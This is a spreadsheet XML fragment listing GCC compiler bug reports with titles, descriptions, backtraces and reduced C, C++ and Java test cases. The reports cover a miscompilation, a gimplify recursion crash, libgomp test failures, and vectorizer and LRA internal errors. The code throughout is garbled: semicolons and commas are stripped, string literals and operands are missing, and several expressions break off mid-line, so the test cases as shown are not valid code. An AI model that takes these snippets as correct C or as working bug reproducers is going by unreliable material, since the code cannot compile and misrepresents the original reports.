#9  0x0000000010a447fc in execute_pass_list(function* opt_pass*) ()
#10 0x00000000103af6d4 in cgraph_node::expand() ()
#11 0x00000000103b2d1c in symbol_table::compile() ()
#12 0x00000000102659f8 in lto_main() ()
#13 0x0000000010c38bd4 in compile_file() ()
#14 0x00000000101f6f5c in toplev::main(int char**) ()
#15 0x00000000101fcda4 in main ()</t>
  </si>
  <si>
    <t>GCC-64878</t>
  </si>
  <si>
    <t>[5 Regression] Miscompilation of nntpgrab</t>
  </si>
  <si>
    <t>Starting with r218451 gcc miscompiles at -O2 on x86_64-linux (both -m64 and -m32) following testcase:
struct A { int a1 }
struct B { char *b1 int b2 int b3 }
struct C { char *c1 int c2 struct B *c3 }
extern struct A *f1 (char *s)
static struct A *f2 (struct C *x)
__attribute__ ((noinline noclone)) int f3 (struct A *x struct A *z) { asm volatile ( : : g (x) g (z) : memory) return 0 }
__attribute__ ((noinline noclone)) void f4 (struct A *x char *y struct A *z) { asm volatile ( : : g (x) g (z) g (y) : memory) }
__attribute__ ((noinline noclone)) struct B *f5 (void) { static char b[32] static struct B f3 = { b 0 32 } return  }
__attribute__ ((noinline noclone)) int f6 (struct B *p char *w int z) { asm volatile ( : : g (p) g (w) g (z) : memory) return 0 }
__attribute__ ((noinline noclone)) void f7 (struct B *p) { asm volatile ( : : g (p) : memory) }
__attribute__ ((noinline noclone)) void f8 (struct B *p) { asm volatile ( : : g (p) : memory) }
__attribute__ ((noinline noclone)) void f9 (struct A *x) { asm volatile ( : : g (x) : memory) }
__attribute__ ((noinline noclone)) struct A *f10 (void) { static struct A j asm volatile ( : :  : memory) return  }
__attribute__ ((noinline noclone)) struct A *f11 (void) { static struct A j asm volatile ( : :  : memory) return  }
__attribute__ ((noinline noclone)) struct A *f12 (int b) { static struct A j asm volatile ( : : g (b) : memory) return  }
__attribute__ ((noinline noclone)) struct A *f13 (int i) { static struct A j asm volatile ( : : g (i) : memory) return  }
__attribute__ ((noinline noclone)) struct A *f14 (double d) { static struct A j asm volatile ( : : g ( return  }
__attribute__ ((noinline noclone)) struct A *f15 (char *s) { static struct A j asm volatile ( : : g (s) : memory) return  }
char *t = 0123456789abcdef
char *u = 0123456789.+-e
__attribute__ ((noinline noclone)) struct A *
f1 (char *s)
{
  struct C f
  struct A *o
  f.c1 = s
  f.c2 = 0
  f.c3 = f5 ()
  o = f2 (
  f8 (f.c3)
  return o
}
static struct A *
f2 (struct C *x)
{
  int a b e = 0
  struct A *f = 0 *o
  char *g = 0
  char h = '\0'
  int i = 0 j = 0
  a = 0
  b = 1
  char c
  do
    {
      c = x-&gt;c1[x-&gt;c2]
      switch (a)
	{
	case 0:
	  if (c == ' ')
	    x-&gt;c2++
	  else if (c == '/')
	    {
	      a = 4
	      j = x-&gt;c2++
	    }
	  else
	    a = b
	  break
	case 1:
	  switch (c)
	    {
	    case '{':
	      a = 0
	      b = 15
	      f = f10 ()
	      x-&gt;c2++
	      break
	    case '[':
	      a = 0
	      b = 13
	      f = f11 ()
	      x-&gt;c2++
	      break
	    case 'N':
	    case 'n':
	      a = 3
	      j = x-&gt;c2++
	      break
	    case '':
	    case '\'':
	      h = c
	      f7 (x-&gt;c3)
	      a = 8
	      j = ++x-&gt;c2
	      break
	    case 'T':
	    case 't':
	    case 'F':
	    case 'f':
	      a = 11
	      j = x-&gt;c2++
	      break
	    case '0' ... '9':
	    case '-':
	      i = 0
	      a = 12
	      j = x-&gt;c2++
	      break
	    default:
	      e = 1
	      goto out
	    }
	  break
	case 2:
	  goto out
	case 3:
	  if (__builtin_strncmp (null x-&gt;c1 + j x-&gt;c2 - j))
	    {
	      e = 2
	      goto out
	    }
	  if (x-&gt;c2 - j == 4)
	    {
	      f = 0
	      b = 2
	      a = 0
	    }
	  else
	    x-&gt;c2++
	  break
	case 4:
	  if (c == '*')
	    a = 5
	  else if (c == '/')
	    a = 6
	  else
	    {
	      e = 8
	      goto out
	    }
	  x-&gt;c2++
	  break
	case 5:
	  if (c == '*')
	    a = 7
	  x-&gt;c2++
	  break
	case 6:
	  if (c == '\n')
	    a = 0
	  x-&gt;c2++
	  break
	case 7:
	  if (c == '/')
	    a = 0
	  else
	    a = 5
	  x-&gt;c2++
	  break
	case 8:
	  if (c == h)
	    {
	      f6 (x-&gt;c3 x-&gt;c1 + j x-&gt;c2 - j)
	      f = f15 (x-&gt;c3-&gt;b1)
	      b = 2
	      a = 0
	    }
	  else if (c == '\\')
	    {
	      b = 8
	      a = 9
	    }
	  x-&gt;c2++
	  break
	case 9:
	  switch (c)
	    {
	    case '':
	    case '\\':
	      f6 (x-&gt;c3 x-&gt;c1 + j x-&gt;c2 - j - 1)
	      j = x-&gt;c2++
	      a = b
	      break
	    case 'b':
	    case 'n':
	    case 'r':
	    case 't':
	      f6 (x-&gt;c3 x-&gt;c1 + j x-&gt;c2 - j - 1)
	      if (c == 'b')
		f6 (x-&gt;c3 \b 1)
	      else if (c == 'n')
		f6 (x-&gt;c3 \n 1)
	      else if (c == 'r')
		f6 (x-&gt;c3 \r 1)
	      else if (c == 't')
		f6 (x-&gt;c3 \t 1)
	      j = ++x-&gt;c2
	      a = b
	      break
	    case 'u':
	      f6 (x-&gt;c3 x-&gt;c1 + j x-&gt;c2 - j - 1)
	      j = ++x-&gt;c2
	      a = 10
	      break
	    default:
	      e = 7
	      goto out
	    }
	  break
	case 10:
	  if (__builtin_strchr (t c))
	    {
	      x-&gt;c2++
	      if (x-&gt;c2 - j == 4)
		{
		  unsigned char w[3]
		  unsigned int s =
		    (((x-&gt;c1[j] c1[j] - '0' : (x-&gt;c1[j] &amp; 7) + 9) &lt;&lt; 12)
		    + (((x-&gt;c1[j + 1] c1[j + 1] - '0' : (x-&gt;c1[j + 1] &amp; 7) + 9) &lt;&lt; 8)
		    + (((x-&gt;c1[j + 2] c1[j + 2] - '0' : (x-&gt;c1[j + 2] &amp; 7) + 9) &lt;&lt; 4)
		    + ((x-&gt;c1[j + 3] c1[j + 3] - '0' : (x-&gt;c1[j + 3] 
		  if (s &lt; 0x80)
		    {
		      w[0] = s
		      f6 (x-&gt;c3 (char *) w 1)
		    }
		  else if (s &lt; 0x800)
		    {
		      w[0] = 0xc0 | (s &gt;&gt; 6)
		      w[1] = 0x80 | (s 
		      f6 (x-&gt;c3 (char *) w 2)
		    }
		  else
		    {
		      w[0] = 0x0 | (s &gt;&gt; 12)
		      w[1] = 0x80 | ((s &gt;&gt; 6) 
		      w[2] = 0x80 | (s 
		      f6 (x-&gt;c3 (char *) w 3)
		    }
		  j = x-&gt;c2
		  a = b
		}
	    }
	  else
	    {
	      e = 7
	      goto out
	    }
	  break
	case 11:
	  if (__builtin_strncmp (true x-&gt;c1 + j x-&gt;c2 - j) == 0)
	    {
	      if (x-&gt;c2 - j == 4)
		{
		  f = f12 (1)
		  b = 2
		  a = 0
		}
	      else
		x-&gt;c2++
	    }
	  else if (__builtin_strncmp (false x-&gt;c1 + j x-&gt;c2 - j) == 0)
	    {
	      if (x-&gt;c2 - j == 5)
		{
		  f = f12 (0)
		  b = 2
		  a = 0
		}
	      else
		x-&gt;c2++
	    }
	  else
	    {
	      e = 3
	      goto out
	    }
	  break
	case 12:
	  if (!c || !__builtin_strchr (u c))
	    {
	      if (!i)
		f = f13 (0)
	      else
		f = f14 (0.0)
	      b = 2
	      a = 0
	    }
	  else
	    {
	      if (c == '.' || c == 'e')
		i = 1
	      x-&gt;c2++
	    }
	  break
	case 13:
	  if (c == ']')
	    {
	      x-&gt;c2++
	      b = 2
	      a = 0
	    }
	  else
	    {
	      o = f2 (x)
	      if (((unsigned long) o &gt; (unsigned long) -4000L))
		{
		  e = 5
		  goto out
		}
	      f3 (f o)
	      b = 14
	      a = 0
	    }
	  break
	case 14:
	  if (c == ']')
	    {
	      x-&gt;c2++
	      b = 2
	      a = 0
	    }
	  else if (c == '')
	    {
	      x-&gt;c2++
	      b = 13
	      a = 0
	    }
	  else
	    {
	      f9 (f)
	      e = 5
	      goto out
	    }
	  break
	case 15:
	  a = 16
	  j = x-&gt;c2
	  break
	case 16:
	  if (c == '}')
	    {
	      x-&gt;c2++
	      b = 2
	      a = 0
	    }
	  else if (c == '' || c == '\'')
	    {
	      h = c
	      f7 (x-&gt;c3)
	      a = 17
	      j = ++x-&gt;c2
	    }
	  else
	    {
	      e = 6
	      goto out
	    }
	  break
	case 17:
	  if (c == h)
	    {
	      f6 (x-&gt;c3 x-&gt;c1 + j x-&gt;c2 - j)
	      g = __builtin_strdup (x-&gt;c3-&gt;b1)
	      b = 18
	      a = 0
	    }
	  else if (c == '\\')
	    {
	      b = 17
	      a = 9
	    }
	  x-&gt;c2++
	  break
	case 18:
	  if (c == ':')
	    {
	      x-&gt;c2++
	      b = 19
	      a = 0
	    }
	  else
	    {
	      e = -6
	      goto out
	    }
	  break
	case 19:
	  o = f2 (x)
	  if (((unsigned long) o &gt; (unsigned long) -4000L))
	    {
	      e = 6
	      goto out
	    }
	  f4 (f g o)
	  __builtin_free (g)
	  g = 0
	  b = 20
	  a = 0
	  break
	case 20:
	  if (c == '}')
	    {
	      x-&gt;c2++
	      b = 2
	      a = 0
	    }
	  else if (c == '')
	    {
	      x-&gt;c2++
	      b = 15
	      a = 0
	    }
	  else
	    {
	      e = 6
	      goto out
	    }
	  break
	}
    }
  while (c)
  if (a != 2 &amp;&amp; b != 2)
    e = 9
out:
  __builtin_free (g)
  if (e == 0)
    return f
  f9 (f)
  return 0
}
int
main ()
{
  asm volatile ( : : : memory)
  struct A *r = f1 ({ \id\: null \blahah\: \foobarbazbar\ \barbar\: { \barbarbarba\:
		    \abcdefgh\ \ijklmnopqr\: \stuvwxyzabcdefghijklmnopqrstuv\ \xyzxyz\:
		     [ \1\ ] } })
  if (!r)
    __builtin_abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-1656</t>
  </si>
  <si>
    <t>gcc incorrectly accepts template syntax on non-template class</t>
  </si>
  <si>
    <t>The following is accepted by CVS gcc and 2.95.2:
-------------
template  struct Outer
{
    struct Inner
    void f() {  Inner i      }
}
-------------
I think it shouldn't be since `Inner' is no template so
`Inner' shouldn't really make sense.
Regards
  Wolfgang
Release:
unknown
Environment:
gcc CVS 2001-01-14 and gcc2.95.2</t>
  </si>
  <si>
    <t>GCC-15769</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE: infinite recursion through gimplify_expr</t>
  </si>
  <si>
    <t>Here's another case of blowing the stack.  I found this when building xalan from
rhug.  No small test case yet.  I can't seem to find a work around.
gcj --encoding=ISO-8859-1 -Wno-deprecated
--classpath=upstream/src:/home/green/sources/jhbuild-src/rhug/xalan/upstream/src:/home/green/sources/jhbuild-src/rhug/xalan/../BCEL/upstream/src/java:/home/green/sources/jhbuild-src/rhug/xalan/../jakarta-regexp/upstream/src/java:/home/green/sources/jhbuild-src/rhug/xalan/../cup/upstream:/home/green/sources/jhbuild-src/rhug/xalan/../xerces/upstream/src
-fassume-compiled -g -O2 -c
/home/green/sources/jhbuild-src/rhug/xalan/upstream/src/org/apache/xalan/templates/TemplateSubPatternAssociation.java
-MT upstream/src/org/apache/xalan/templates/TemplateSubPatternAssociation.lo -MD
-MP -MF
.deps/upstream/src/org/apache/xalan/templates/TemplateSubPatternAssociation.TPlo
 -fPIC -o
upstream/src/org/apache/xalan/templates/.libs/TemplateSubPatternAssociation.o
gcj: Internal error: Segmentation fault (program jc1)
Please submit a full bug report.
See  for instructions.
#0  0x0093c62e in vfprintf () from /lib/tls/libc.so.6
#1  0x0095732b in vsprintf () from /lib/tls/libc.so.6
#2  0x0094534d in sprintf () from /lib/tls/libc.so.6
#3  0x080d7952 in create_tmp_var_name (prefix=0x83e78c0 %s.%lu)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:301
#4  0x080d79bb in create_tmp_var_raw (type=0xf6ebc000
    prefix=0x83e7bed iftmp)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:319
#5  0x080d7ad0 in create_tmp_var (type=0x83e78c0 prefix=0x83e7bed iftmp)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:359
#6  0x080dd28c in gimplify_cond_expr (expr_p=0xf5571544 pre_p=0xfe400794
    target=0x83e78c0)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:2356
#7  0x080dfa62 in gimplify_expr (expr_p=0xf5571544 pre_p=0xfe400794
    post_p=0xfe4006f0 gimple_test_f=0x80d6ac8 
    fallback=fb_rvalue)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3201
#8  0x080dd3ab in gimplify_cond_expr (expr_p=0xfe400808 pre_p=0xfe400794
    target=0x83e78c0)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:2408
#9  0x080dfa62 in gimplify_expr (expr_p=0xfe400808 pre_p=0xfe400794
    post_p=0xfe400790 gimple_test_f=0x80d6b84 
    fallback=fb_none)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3201
#10 0x080df107 in gimplify_stmt (stmt_p=0xfe400808)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3062
#11 0x080dd1c6 in gimplify_cond_expr (expr_p=0xf55714c0 pre_p=0xfe4008f4
    target=0x83e78c0)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:2375
#12 0x080dfa62 in gimplify_expr (expr_p=0xf55714c0 pre_p=0xfe4008f4
    post_p=0xfe400850 gimple_test_f=0x80d6ac8 
    fallback=fb_rvalue)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3201
#13 0x080dd3ab in gimplify_cond_expr (expr_p=0xfe400968 pre_p=0xfe4008f4
    target=0x83e78c0)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:2408
#14 0x080dfa62 in gimplify_expr (expr_p=0xfe400968 pre_p=0xfe4008f4
    post_p=0xfe4008f0 gimple_test_f=0x80d6b84 
    fallback=fb_none)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3201
#15 0x080df107 in gimplify_stmt (stmt_p=0xfe400968)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3062
#16 0x080dd1c6 in gimplify_cond_expr (expr_p=0xf5571410 pre_p=0xfe400a54
    target=0x83e78c0)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:2375
#17 0x080dfa62 in gimplify_expr (expr_p=0xf5571410 pre_p=0xfe400a54
    post_p=0xfe4009b0 gimple_test_f=0x80d6ac8 
    fallback=fb_rvalue)
    at /home/green/sources/jhbuild-src/gcc/gcc/gimplify.c:3201</t>
  </si>
  <si>
    <t>GCC-69468</t>
  </si>
  <si>
    <t>tail merge should ignore private edge flags</t>
  </si>
  <si>
    <t>https://gcc.gnu.org/ml/gcc-patches/2016-01/msg01880.html
...
&gt; One reason is that an edge_flag EDGE_EXECUTABLE happens to be set which
&gt; prevents tail-merge from doing a merge.
&gt; Using first attached patch which:
&gt; - clears EDGE_EXECUTABLE in tail-merge and
this shows a latent issue in tail-merging that it doesn't ignore
edge flags that are private (that is they have random state upon
pass entry).
...</t>
  </si>
  <si>
    <t>GCC-64845</t>
  </si>
  <si>
    <t>FAIL: libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 (test for excess errors)</t>
  </si>
  <si>
    <t>spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp/ -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp/.libs -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp -I/test/gnu/gcc/gcc/libgomp/testsuite/../../include -I/test/gnu/gcc/gcc/libgomp/testsuite/.. -fmessage-length=0 -fno-diagnostics-show-caret -fdiagnostics-color=never -fopenacc -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 -O2 -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp/.libs -lm -o ./reduction-4.exe
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c:8:21: fatal error: complex.h: No such file or directory
compilation terminated.
compiler exited with status 1
output is:
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c:8:21: fatal error: complex.h: No such file or directory
compilation terminated.
FAIL: libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c:8:21: fatal error: complex.h: No such file or directory
compilation terminated.
spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /test/gnu/gcc/gcc/li
bgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c -B/test/gn
u/gcc/objdir/hppa64-hp-hpux11.11/./libgomp/ -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.
11/./libgomp/.libs -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp -I/test/gnu/
gcc/gcc/libgomp/testsuite/../../include -I/test/gnu/gcc/gcc/libgomp/testsuite/.. -fm
essage-length=0 -fno-diagnostics-show-caret -fdiagnostics-color=never -fopenacc -DAC
C_DEVICE_TYPE_host=1 -DACC_MEM_SHARED=1 -O2 -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.
11/./libgomp/.libs -lm -o ./reduction-4.exe
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/redu
ction-4.c:8:21: fatal error: complex.h: No such file or directory
compilation terminated.
compiler exited with status 1
output is:
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/redu
ction-4.c:8:21: fatal error: complex.h: No such file or directory
compilation terminated.
FAIL: libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c -DACC_DEVICE_TYPE_host=1 -DACC_MEM_SHARED=1 (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c/../libgomp.oacc-c-c++-common/reduction-4.c:8:21: fatal error: complex.h: No such file or directory
compilation terminated.
spawn /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ -x c++ /test/gnu/gcc
/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c -
B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp/ -B/test/gnu/gcc/objdir/hppa64-h
p-hpux11.11/./libgomp/.libs -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp -I/
test/gnu/gcc/gcc/libgomp/testsuite/../../include -I/test/gnu/gcc/gcc/libgomp/testsui
te/.. -fmessage-length=0 -fno-diagnostics-show-caret -fdiagnostics-color=never -fope
nacc -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 -nostdinc++ -I/test/gnu/gcc/
objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/hppa64-hp-hpux11.11 -I/test/gnu/gcc/
objdir/hppa64-hp-hpux11.11/libstdc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/lib
supc++ -I/test/gnu/gcc/gcc/libstdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc
++-v3/testsuite/util -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp/../libstdc
++-v3/src/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp/.libs -L/test/g
nu/gcc/objdir/hppa64-hp-hpux11.11/./libgomp/../libstdc++-v3/src/.libs -lstdc++ -lm -
o ./reduction-4.exe
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/re
duction-4.c: In function 'int main()':
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/re
duction-4.c:17:18: error: expected initializer before 'vresult'
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/re
duction-4.c:21:5: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/re
duction-4.c:23:3: error: 'result' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/re
duction-4.c:24:3: error: 'vresult' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:30:15: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:34:16: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:100:39: error: 'creal' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:100:49: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:104:40: error: 'creal' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:104:50: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:119:39: error: 'creal' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:119:49: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:123:40: error: 'creal' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:123:50: error: 'array' was not declared in this scope
compiler exited with status 1
output is:
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c: In function 'int main()':
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:17:18: error: expected initializer before 'vresult'
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:21:5: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:23:3: error: 'result' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:24:3: error: 'vresult' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:30:15: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:34:16: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:100:39: error: 'creal' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:100:49: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:104:40: error: 'creal' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:104:50: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/re
duction-4.c:119:39: error: 'creal' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:119:49: error: 'array' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:123:40: error: 'creal' was not declared in this scope
/test/gnu/gcc/gcc/libgomp/testsuite/libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c:123:50: error: 'array' was not declared in this scope
FAIL: libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 (test for excess errors)
and
FAIL: libgomp.oacc-c++/../libgomp.oacc-c-c++-common/reduction-4.c -DACC_DEVICE_TYPE_host=1 -DACC_MEM_SHARED=1 (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-82289</t>
  </si>
  <si>
    <t>[8 Regression] ICE at -O3 on x86_64-linux-gnu: in vect_get_num_copies at tree-vectorizer.h:1093</t>
  </si>
  <si>
    <t>$ gcctk -v
Using built-in specs.
COLLECT_GCC=gcctk
COLLECT_LTO_WRAPPER=/home/su/software/tmp/gcc/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/home/su/software/tmp/gcc/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170921 (experimental) [trunk revision 253084] (GCC)
$
$ gcctk -O2 -c small.c
$
$ gcctk -O3 -c small.c
during GIMPLE pass: vect
small.c: In function â€˜fn1â€™:
small.c:3:6: internal compiler error: in vect_get_num_copies at tree-vectorizer.h:1093
 void fn1 (int *j)
      ^~~
0x14b2236 vect_get_num_copies
        ../../gcc-source-trunk/gcc/tree-vectorizer.h:1092
0x14b2236 vect_get_data_access_cost
        ../../gcc-source-trunk/gcc/tree-vect-data-refs.c:1195
0x14b2236 vect_get_peeling_costs_all_drs
        ../../gcc-source-trunk/gcc/tree-vect-data-refs.c:1339
0x14bf48e vect_enhance_data_refs_alignment(_loop_vec_info*)
        ../../gcc-source-trunk/gcc/tree-vect-data-refs.c:1797
0xefe706 vect_analyze_loop_2
        ../../gcc-source-trunk/gcc/tree-vect-loop.c:2018
0xefe706 vect_analyze_loop(loop* _loop_vec_info*)
        ../../gcc-source-trunk/gcc/tree-vect-loop.c:2354
0xf170e5 vectorize_loops()
        ../../gcc-source-trunk/gcc/tree-vectorizer.c:685
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
-------------------------------------
int a b c *d *f[1]
void fn1 (int *j)
{ 
  int e g h = 1
  for ( e e++)
    { 
      if (g &gt; 0)
        { 
          d = j
          return
        }
      if (!h)
        while (g)
      while (h &lt; 1)
        if (a)
          { 
            fn1 (
            h = 0
          }
      f[e] = 
    }
  while (1)
}</t>
  </si>
  <si>
    <t>GCC-67201</t>
  </si>
  <si>
    <t>PowerPC -mlra hits ICE: Max. number of generated reload insns per insn is achieved</t>
  </si>
  <si>
    <t>I'm seeing an ICE on ppc64le when using -O1 -mlra:
# gcc -O1 -mlra testcase.i
testcase.i:31:1: internal compiler error: Max. number of generated reload insns per insn is achieved (90)
 }
 ^
0x1067d093 lra_constraints(bool)
	../../gcc/gcc/lra-constraints.c:4345
0x10661c8b lra(_IO_FILE*)
	../../gcc/gcc/lra.c:2300
0x1060286b do_reload
	../../gcc/gcc/ira.c:5394
0x1060286b execute
	../../gcc/gcc/ira.c:5565
# cat testcase.i
typedef struct {
} cGH
typedef int (*reduction_fn_t) (cGH * GH int proc int num_dims int from[]
			       int to[] int iterator[] int points_per_dim[]
			       int num_points int num_inarrays int intypes[]
			       void *inarrays[] int num_outvals
			       double outvals[])
static int copy_real_to_outtype(int num_elems double inarray[] int outtype
				void *outarray)
int PUGH_ReductionGVs(cGH * GH int proc int num_invars int invars[]
		      int outtype int num_outvals void *outvals
		      reduction_fn_t reduction_fn)
{
	int i myproc outtypesize this_retval retval
	double result
	for (i = 0 i &lt; num_invars i++) {
		switch (CCTK_GroupTypeFromVarI(invars[i])) {
		case 2:
		case 3:
			this_retval =
			    PUGH_ReductionGA(GH invars[i] proc &amp;result
					     reduction_fn)
		}
		if (this_retval == 0 &amp;&amp; (proc &lt; 0 || proc == myproc)) {
			this_retval =
			    copy_real_to_outtype(1 &amp;result outtype
						 (char *)outvals +
						 i * outtypesize)
		}
	}
}
static int copy_real_to_outtype(int num_elems double inarray[] int outtype
				void *outarray)
{
	int i retval
	if (outtype == 1) {
		long double *_outarray = (long double *)outarray
		for (i = 0 i &lt; num_elems i++) {
			_outarray[i] = (long double)inarray[i]
		}
	}
}</t>
  </si>
  <si>
    <t>GCC-10750</t>
  </si>
  <si>
    <t>[3.4 regression] error with using template template expression in static const initializer</t>
  </si>
  <si>
    <t>The attached (syntactically correct) code causes an erroneous error message:
test.cc:6: error: `list_search::answer' cannot appear in a constant-expression.
Old parser (3.0 .. 3.3) has not any problems with this.
Release:
3.4 20030509 (experimental)
Environment:
RedHat 7.3 on an Athlon PC
